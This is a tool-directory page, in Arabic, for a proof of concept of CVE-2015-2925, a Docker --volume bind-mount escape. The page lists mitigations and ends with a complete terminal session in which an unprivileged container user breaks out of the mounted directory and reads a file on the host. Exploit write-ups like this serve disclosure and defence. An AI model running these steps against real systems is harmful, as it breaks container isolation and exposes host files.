Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
docker_cve-2015-2925 — Docker + CVE-2015-2925 = الهروب من --volume | Kitploit
أدوات/GitHubGitHub/kagami/docker_cve-2015-2925
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمرالهروب من الحاوية
GitHubkagami/docker_cve-2015-2925

docker_cve-2015-2925

Docker + CVE-2015-2925 = الهروب من --volume

عرض المستودع
1123منذ 11 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Docker + CVE-2015-2925 = الهروب من --volume

ثغرة حديثة في لينكس معروفة منذ حوالي نصف عام (عدة أشهر بشكل علني) جعلت من الممكن الهروب من عمليات الربط (bind mounts). وبشكل خاص في حالة Docker، من الممكن الهروب من داخل الدليل المُثبَّت عبر خيار --volume إلى نظام الملفات الخاص بالمضيف.

فريق أمان Docker على علم بالفعل بالمشكلة وسمح بنشر هذا لجذب انتباه الجمهور.

الشكر لـ Jann Horn على الإشارة إلى هذا، في الأساس قمت فقط بإعادة إنتاجه.

التخفيف

أيٌّ من الإجراءات التالية سيكون كافيًا:

  • نواة مفعّلة بـ AppArmor وملف تعريف AppArmor الخاص بـ Docker
  • نواة مفعّلة بـ SELinux وسياسة SELinux الخاصة بـ Docker
  • تعطيل مساحات أسماء المستخدمين (user namespaces) في النواة

ملاحظات

  • لم يتم إصلاح هذا في المنبع (upstream) والتوزيعات بعد، ويجب أن يعمل على أي نواة حديثة
  • هذا لا يتطلب صلاحيات الجذر (root) داخل الحاوية
  • توفر التوزيعات إصدارات مختلفة من حزمة util-linux التي يُعد unshare(1) جزءًا منها، وقد يُرجع "Operation not permitted" في حالتك؛ تم اختبار حزمة Debian Jessie وكانت تعمل كما هو متوقع.

إثبات المفهوم

root@kitploit:~
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped
تنزيل الأداة